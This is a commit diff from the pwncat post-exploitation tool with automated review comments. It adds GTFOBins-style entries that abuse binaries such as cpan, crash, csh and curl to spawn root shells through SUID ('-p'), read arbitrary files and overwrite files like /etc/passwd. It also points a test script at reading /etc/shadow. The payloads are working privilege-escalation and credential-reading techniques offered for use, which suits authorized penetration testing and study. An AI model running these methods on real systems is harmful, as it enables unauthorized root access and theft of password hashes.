Merge branch 'master' of github.com:calebstewart/pwncat
commit
c35e0ff8ec
@ -86,7 +86,7 @@
|
|||||||
},
|
},
|
||||||
{
|
{
|
||||||
"type": "read",
|
"type": "read",
|
||||||
"stream": "print",
|
"stream": "raw",
|
||||||
"payload": "{command}",
|
"payload": "{command}",
|
||||||
"args": ["-c", "'{cat} {lfile}'"],
|
"args": ["-c", "'{cat} {lfile}'"],
|
||||||
"suid": ["-p"]
|
"suid": ["-p"]
|
||||||
@ -364,15 +364,129 @@
|
|||||||
"exit": "exit\n"
|
"exit": "exit\n"
|
||||||
}
|
}
|
||||||
|
|
||||||
// Could we do some file_read and file_write with this too..?
|
// Could we do some file_read and file_write with this too..? We can run cobol...
|
||||||
],
|
],
|
||||||
//-------------------------------------------------------------------
|
//-------------------------------------------------------------------
|
||||||
// "cpan": [
|
"cpan": [
|
||||||
// {
|
{
|
||||||
// "type": "shell",
|
"type": "shell",
|
||||||
// "payload": "{command}",
|
"payload": "{command}",
|
||||||
// "input" : "! exec {shell} -p\n",
|
"input" : "! system(\"{shell} -p\")\n",
|
||||||
// "exit": "exit\n"
|
// exit the shell, AND exit cpan
|
||||||
// }
|
"exit": "exit\nexit\n"
|
||||||
// ]
|
}
|
||||||
|
|
||||||
|
// Could we do some file_read and file_write with this too? We can run perl...
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"cpulimit": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-l", "100", "-f", "\"{shell}\""],
|
||||||
|
// exit the shell, AND exit cpan
|
||||||
|
"exit": "exit\n"
|
||||||
|
}
|
||||||
|
// We cannot seem to pass other arguments to process ran, so no read/write (???)
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"crash": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-h"],
|
||||||
|
"input": "!{shell} -p\n",
|
||||||
|
// exit the shell, AND exit cpan
|
||||||
|
"exit": "exit\nq\n"
|
||||||
|
}
|
||||||
|
// We cannot seem to pass other arguments to process ran, so no read/write (???)
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"csh": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"suid": ["-b"],
|
||||||
|
"input": "{shell} -p\n",
|
||||||
|
// exit the shell, AND exit csh
|
||||||
|
"exit": "exit\nexit\n"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command}",
|
||||||
|
// "suid" is not supplied because it must be very last argument
|
||||||
|
"args": ["-c", "\"{cat} {lfile}\"", "-b"]
|
||||||
|
}
|
||||||
|
// Using write, it doesn't get the entire text to clobber /etc/passwd
|
||||||
|
// {
|
||||||
|
// "type": "write",
|
||||||
|
// "stream": "base64",
|
||||||
|
// "payload": "{command}",
|
||||||
|
// "args": ["-c", "\"{base64} -d > {lfile}\"", "-b"],
|
||||||
|
// // "suid" is not supplied because it must be very last argument
|
||||||
|
// "exit": "{ctrl_d}"
|
||||||
|
// }
|
||||||
|
],
|
||||||
|
"bsd-csh": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"input": "{shell} -p\n",
|
||||||
|
"suid": ["-b"],
|
||||||
|
// exit the shell, AND exit csh
|
||||||
|
"exit": "exit\nexit\n"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command}",
|
||||||
|
// "suid" is not supplied because it must be very last argument
|
||||||
|
"args": ["-c", "\"{cat} {lfile}\"", "-b"]
|
||||||
|
}
|
||||||
|
// Using write, it doesn't get the entire text to clobber /etc/passwd
|
||||||
|
// {
|
||||||
|
// "type": "write",
|
||||||
|
// "stream": "base64",
|
||||||
|
// "payload": "{command}",
|
||||||
|
// "args": ["-c", "\"{base64} -d > {lfile}\"", "-b"],
|
||||||
|
// // "suid" is not supplied because it must be very last argument
|
||||||
|
// "exit": "{ctrl_d}"
|
||||||
|
// }
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"curl": [
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "raw",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-s", "file://{lfile} --output -"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "base64",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-s", "file://{lfile} --output - | {base64} -w 0"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "write",
|
||||||
|
"stream": "print",
|
||||||
|
// This is weird because under the case where we are running w/ sudo,
|
||||||
|
// we need to ask for the password first. The first "{command}" will
|
||||||
|
// ask for the sudo password, then fail. The second "{command}"
|
||||||
|
// will not ask for the sudo password, and then the copy will succeed.
|
||||||
|
// Without sudo, the first command will simply fail, and the second
|
||||||
|
// will succeed. This is the same for the other payload below.
|
||||||
|
"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {cat} > $TF; {command}; rm -f $TF",
|
||||||
|
"args": ["-s", "file://$TF --output {lfile}"],
|
||||||
|
"exit": "{ctrl_d}"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "write",
|
||||||
|
"stream": "base64",
|
||||||
|
"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {base64} -d > $TF; {command}; rm -f $TF",
|
||||||
|
"args": ["-s", "file://$TF --output {lfile}"],
|
||||||
|
"exit": "{ctrl_d}"
|
||||||
|
}
|
||||||
|
]
|
||||||
}
|
}
|
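Review bot: The comment `// exit the shell, AND exit cpan` was carried over into the new `cpulimit` entry (above `"exit": "exit\n"`) and into `crash` (above `"exit": "exit\nq\n"`), where it no longer matches the exit strings; they should read `// exit the shell` and `// exit the shell, AND quit crash` respectively. The `bsd-csh` entry is a line-for-line copy of `csh`, commented-out write method included, so the two will drift unless the loader supports an alias; failing that, a one-line `// identical to "csh" above; keep in sync` at the top of `bsd-csh` at least flags the duplication. In both `curl` write methods the staged file is made world-readable with `{chmod} ugo+r $TF` until `rm -f $TF` runs, so whatever is being written is briefly visible to every local user; the comment block explains the double `{command}` but not why a mode wider than `u+r` is needed, and that deserves a line. Whether `"file://{lfile} --output -"` is meant to be one argument or two depends on how `args` are joined by the loader, which is not visible here.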
@ -1 +1 @@
|
|||||||
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+VJVsigrS5KE58trqdBdMuGVREI7EnHmrZEOExackIFDwolUiOvV33DA2cBVBVzEF6dF8ARd9875P6LtPveJXzXSFu7oxfoHwwnIaOb1Jkal4JkDTVXePIRupZhXT6bfKd3Zewx1ZbQi0pRZnrbe6ardrGFw6YZvrWRZAG9rGfQCI7GjMRz5+mMDA0oKzhBDuemkL/wElJE30Ky3jWWMRT4deK5t1ds940t3/r2pqodHA+n4NA0JxEyPH7c6nXXsCD6KZIYcqwrBSBvlRYQ1rp6BpSqoetqifAF3slUcdam+F1RLmnNu+qL0a1H7cZoM4t5dvWJf1x7AFuGma2YKBMq5nGMG1zfphBAMyMV4LiEmFJp6dZkT9wKG8tpuH8Wc14K68ClZroGQLTUeu6uwhTceKcXHJ7XXy1RRkRiNqz+9YzBEXybstHmQn0NXHlk7Ni3I/XORWcsxwZjJGOrXJ/ipnpEW009KU0VmRP0sOrdMl9iCUZUlatCDcKEDWDuE= caleb@stewie-xps
|
ssh-rsa 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 pwncat@pwncat
|
||||||
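Review bot: Replacing the single key line leaves the previous public key for `caleb@stewie-xps` recoverable from history, which is harmless for a public key only if the matching private key was never committed and no test host still lists it as authorized; worth a quick check of the repository history. Moving from a personal-workstation key to the tool-specific `pwncat@pwncat` identity is the right direction, but nothing on this page says what the key pair is for, so a sentence in the README naming it as a lab-only test key would help the next reader.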
|
@ -17,8 +17,10 @@ def which(path: str, quote=False):
|
|||||||
gtfo = GTFOBins("data/gtfobins.json", which)
|
gtfo = GTFOBins("data/gtfobins.json", which)
|
||||||
|
|
||||||
|
|
||||||
binary_to_test = "cpan"
|
binary_to_test = "curl"
|
||||||
capabilities_to_test = Capability.SHELL
|
# capabilities_to_test = Capability.SHELL
|
||||||
|
capabilities_to_test = Capability.WRITE
|
||||||
|
# capabilities_to_test = Capability.WRITE
|
||||||
our_shell = "/bin/bash"
|
our_shell = "/bin/bash"
|
||||||
|
|
||||||
binary = gtfo.find_binary(binary_to_test)
|
binary = gtfo.find_binary(binary_to_test)
|
||||||
@ -30,8 +32,8 @@ methods = binary.iter_methods(
|
|||||||
)
|
)
|
||||||
for method in methods:
|
for method in methods:
|
||||||
# print(method)
|
# print(method)
|
||||||
print(method.build(shell=our_shell)[0])
|
# print(method.build(shell=our_shell, suid=True))
|
||||||
# print(method.build(lfile="/etc/shadow")[0])
|
print(method.build(lfile="/etc/shadow", suid=True)[0])
|
||||||
# print(method.build(lfile="/tmp/test", data="hello")[0])
|
# print(method.build(lfile="/tmp/test", data="hello")[0])
|
||||||
|
|
||||||
# all_binaries = list(gtfo.iter_methods(Capability.SHELL))
|
# all_binaries = list(gtfo.iter_methods(Capability.SHELL))
|
||||||
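Review bot: Selecting the target by commenting lines in and out (`binary_to_test = "curl"`, the three `capabilities_to_test` lines in the first hunk, and the alternating `print(method.build(...))` calls in the second) turns every run of this script into a code edit; reading them from the command line, e.g. `binary_to_test = sys.argv[1]` and, if `Capability` is an `enum`, `capabilities_to_test = Capability[sys.argv[2].upper()]`, would let one script exercise shell, read and write without churn. The `@ -17` hunk header quotes `def which(path: str, quote=False)` as context, but every changed line is a module-level statement, so none of this sits inside that function. The hard-coded `lfile="/etc/shadow"` with `suid=True` is reasonable for a manual check, but a comment such as `# any root-only file works here; it only exercises the suid build path` would record why that path was chosen.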
|